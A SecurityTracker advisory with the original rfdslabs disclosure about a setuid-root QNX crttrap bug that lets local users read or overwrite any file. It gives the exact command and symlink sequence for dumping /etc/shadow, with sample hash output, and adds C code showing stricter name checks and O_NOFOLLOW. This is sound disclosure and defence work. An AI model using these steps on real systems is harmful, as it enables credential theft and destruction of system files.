SecurityTracker.com
Category:   OS (Other)  >   QNX
Vendor:   QNX Software Systems Ltd.
QNX crttrap '-c' Lets Local Users Read or Write Arbitrary Files
SecurityTracker Alert ID:  1012712
SecurityTracker URL:  http://securitytracker.com/id/1012712
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Dec 29 2004
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Description:   A vulnerability was reported in the QNX operating system in crttrap. A local user can read and write arbitrary files on the target system.

Julio Cesar Fort from rfdslabs reported that crttrap, which is installed setuid root, writes its trap file under /etc/system/config and lets the user choose the file name with the '-c' option. crttrap rejects '../' in that name but does not reject a path separator on its own, so a local user can make it create a subdirectory under /etc/system/config that the user's group can write to. The user can then replace the trap file in that subdirectory with a symbolic link and invoke crttrap again: the 'dump' command reads the link target (the advisory shows /etc/shadow) and the 'trap' command overwrites it, both with root privileges.

A demonstration exploit command is provided:

$ crttrap -c tmp/rfdslabs trap

After the written trap file is replaced with a symbolic link, the 'dump' command reads the link target and the 'trap' command overwrites it, so any file on the system can be read or overwritten.

The vendor was notified on December 11, 2004.

Impact:   A local user can create, read, or overwrite arbitrary files on the target system.
Solution:   No vendor solution was available at the time of this entry. The reporter suggests removing the setuid bit from crttrap until QNX releases a patch.
Vendor URL:  www.qnx.com/
Cause:   Access control error (insufficient validation of a user-supplied file name in a setuid root program)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] QNX crttrap arbitrary file read/write


*** rfdslabs security advisory ***

Title: QNX crttrap arbitrary file read/write vulnerability [RLSA_06-2004]
Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Vendor: http://www.qnx.com
Date: Dec 11 2004

Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>

1. Introduction

crttrap is a tool that detects video hardware and starts the correct driver for
QNX.

2. Details

crttrap has a '-c' flag to specify where the trap file will be written. Combined
with the 'trap' flag, it is possible to read/write any file on the disk.

By default crttrap writes and reads trap files in "/etc/system/config". Since
this directory is owned by root, we don't have permission to write there. It
filters "../" to prevent directory traversal vulnerabilities. In order to
bypass this protection, we noticed it doesn't check for "/" on its own.
This way it is possible to make it create a subdirectory, giving our group
read and write privileges. Now we are able to manipulate our trap file.

$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x    2 root 100         2048 Dec 11 12:40 .
drwxrwxr-x    3 root root        2048 Dec 11 12:35 ..
-rw-r--r--    1 root 100        21671 Dec 11 12:40 rfdslabs

$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0

We are also able to overwrite any file with the 'trap' switch. As an example, an
attacker can corrupt '/etc/passwd' and make login attempts fail every time.
See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.

PS: On 31 May 2002, Simon Oullette found a bug in the crttrap '-c' flag in
QNX 4.25. But his exploitation technique won't work with the newest versions
because crttrap opens "/etc/system/config" and its subdirectories.


3. Solution

No official solution yet. We suggest removing the crttrap suid bit until QNX
releases a patch.

4. Timeline

10 Dec 2004: Vulnerability detected;
11 Dec 2004: Advisory written; rfdslabs contacts QNX;
20 Dec 2004: QNX replies to rfdslabs;
28 Dec 2004: Advisory released to public.

Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV).

www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil


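The C program below is an added example, not crttrap's source and not QNX code. It reconstructs, as an assumption, the kind of blacklist filter section 2 of the advisory describes (only "../" is rejected) beside a whitelist check that accepts a single file-name component, and it shows a privileged writer opening its config file with O_NOFOLLOW so that the advisory's symlink step (ln -s /etc/shadow rfdslabs) is refused with ELOOP instead of reading or truncating the link target. The function names, the character set the strict check accepts, the 64-byte length limit and the temporary directory used for the demonstration are all assumptions of this example; it uses portable POSIX calls and never touches /etc/system/config.

```c
/* Added example: not crttrap's source and not QNX code.  The "weak" filter
 * is an assumed reconstruction of the behaviour the advisory reports
 * (only "../" is rejected); the strict check and the O_NOFOLLOW open are
 * what a setuid tool should do instead.  CONFIG_DIR is quoted from the
 * advisory but is never opened here; the demo uses a temp directory. */
#define _GNU_SOURCE
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CONFIG_DIR "/etc/system/config"

/* Weak, blacklist-style check: rejects "../" only.  "tmp/rfdslabs" and
 * "/etc/shadow" both pass, which is the bypass described in section 2. */
int weak_name_ok(const char *name)
{
    return name[0] != '\0' && strstr(name, "../") == NULL;
}

/* Strict, whitelist-style check: one path component, a small character set,
 * never "." or "..".  With no separator allowed, crttrap-style subdirectory
 * creation is impossible and only CONFIG_DIR's own ownership matters. */
int strict_name_ok(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > 64) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Open the trap file relative to an already-open directory fd, refusing to
 * follow a symlink at the final component.  If an attacker has replaced the
 * file with "ln -s /etc/shadow rfdslabs", the open fails with ELOOP rather
 * than reading ('dump') or truncating ('trap') the link target.
 * Returns the fd, or -1 with errno set. */
int open_trap_file(int dir_fd, const char *name, int for_write)
{
    if (!strict_name_ok(name)) { errno = EINVAL; return -1; }
    int flags = for_write ? (O_WRONLY | O_CREAT | O_TRUNC) : O_RDONLY;
    return openat(dir_fd, name, flags | O_NOFOLLOW, 0644);
}

/* Self-contained demonstration in a constructed temporary directory:
 * plant a symlink the way the advisory does, then check that the hardened
 * open refuses it (ELOOP) while an ordinary file name still works.
 * Returns 1 on the expected outcome, 0 otherwise. */
int demo_symlink_refused(void)
{
    char tmpl[] = "/tmp/crttrap-demo-XXXXXX";
    char *dir = mkdtemp(tmpl);
    if (dir == NULL) return 0;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd < 0) { rmdir(dir); return 0; }

    int ok = 0;
    /* Attacker step from the advisory: the trap file becomes a symlink.
     * /etc/passwd is the target only so that the link resolves anywhere. */
    if (symlinkat("/etc/passwd", dfd, "rfdslabs") == 0) {
        int fd = open_trap_file(dfd, "rfdslabs", 1);
        int refused = (fd < 0 && errno == ELOOP);
        if (fd >= 0) close(fd);

        int fd2 = open_trap_file(dfd, "plain.cfg", 1);
        int created = (fd2 >= 0);
        if (fd2 >= 0) close(fd2);

        ok = refused && created;
        unlinkat(dfd, "plain.cfg", 0);
        unlinkat(dfd, "rfdslabs", 0);
    }
    close(dfd);
    rmdir(dir);
    return ok;
}

int main(void)
{
    const char *names[] = { "rfdslabs", "tmp/rfdslabs", "../../etc/shadow", "/etc/shadow" };
    printf("trap files normally live under %s; the demo uses a temp dir instead\n", CONFIG_DIR);
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-18s weak=%d strict=%d\n", names[i],
               weak_name_ok(names[i]), strict_name_ok(names[i]));
    printf("symlink refused by O_NOFOLLOW open: %s\n",
           demo_symlink_refused() ? "yes" : "no");
    return 0;
}
```

Compile with cc -o demo demo.c and run it; the table it prints shows that "tmp/rfdslabs" and "/etc/shadow" pass the weak filter but not the strict one. O_NOFOLLOW only protects the final path component, so it is the strict check that stops crttrap-style subdirectory creation, and dropping the setuid bit, as the advisory suggests, removes the privilege the bug abuses in the first place.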
 
 


Copyright 2021, SecurityGlobal.net LLC